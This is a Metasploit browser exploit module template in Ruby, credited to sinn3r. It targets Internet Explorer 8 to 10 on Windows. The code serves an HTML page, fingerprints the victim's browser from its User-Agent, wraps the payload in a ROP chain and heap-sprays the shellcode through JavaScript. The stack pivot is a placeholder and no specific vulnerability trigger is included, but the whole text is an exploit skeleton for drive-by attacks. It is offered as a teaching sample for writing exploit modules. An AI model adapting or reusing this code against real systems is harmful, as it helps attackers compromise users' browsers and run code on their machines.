Windows Browser Example Exploit

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
###  
#  
# This exploit sample demonstrates how a typical browser exploit is written using commonly  
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.  
#  
###  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::RopDb  
include Msf::Exploit::Remote::BrowserAutopwn  
  
# Set :classid and :method for ActiveX exploits. For example:  
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",  
# :method => "SetShapeNodeType",  
autopwn_info({  
:ua_name => HttpClients::IE,  
:ua_minver => "8.0",  
:ua_maxver => "10.0",  
:javascript => true,  
:os_name => OperatingSystems::Match::WINDOWS,  
:rank => NormalRanking  
})  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Module Name",  
'Description' => %q{  
This template covers IE8/9/10, and uses the user-agent HTTP header to detect  
the browser version. Please note IE8 and newer may emulate an older IE version  
in compatibility mode, in that case the module won't be able to detect the  
browser correctly.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'sinn3r' ],  
'References' =>  
[  
[ 'URL', 'http://metasploit.com' ]  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', {} ],  
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],  
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],  
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],  
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],  
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]  
],  
'Payload' =>  
{  
'BadChars' => "\x00", # js_property_spray  
'StackAdjustment' => -3500  
},  
'Privileged' => false,  
'DisclosureDate' => "Apr 1 2013",  
'DefaultTarget' => 0))  
end  
  
def get_target(agent)  
return target if target.name != 'Automatic'  
  
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''  
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''  
  
ie_name = "IE #{ie}"  
  
case nt  
when '5.1'  
os_name = 'Windows XP SP3'  
when '6.0'  
os_name = 'Windows Vista'  
when '6.1'  
os_name = 'Windows 7'  
when '6.2'  
os_name = 'Windows 8'  
when '6.3'  
os_name = 'Windows 8.1'  
end  
  
targets.each do |t|  
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))  
return t  
end  
end  
  
nil  
end  
  
def get_payload(t)  
stack_pivot = "\x41\x42\x43\x44"  
code = payload.encoded  
  
case t['Rop']  
when :msvcrt  
print_status("Using msvcrt ROP")  
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})  
  
else  
print_status("Using JRE ROP")  
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})  
end  
  
rop_payload  
end  
  
  
def get_html(t)  
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))  
html = %Q|  
<script>  
#{js_property_spray}  
  
var s = unescape("#{js_p}");  
sprayHeap({shellcode:s});  
</script>  
|  
  
html.gsub(/^\t\t/, '')  
end  
  
  
def on_request_uri(cli, request)  
agent = request.headers['User-Agent']  
print_status("Requesting: #{request.uri}")  
  
target = get_target(agent)  
if target.nil?  
print_error("Browser not supported, sending 404: #{agent}")  
send_not_found(cli)  
return  
end  
  
print_status("Target selected as: #{target.name}")  
html = get_html(target)  
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })  
end  
end  
`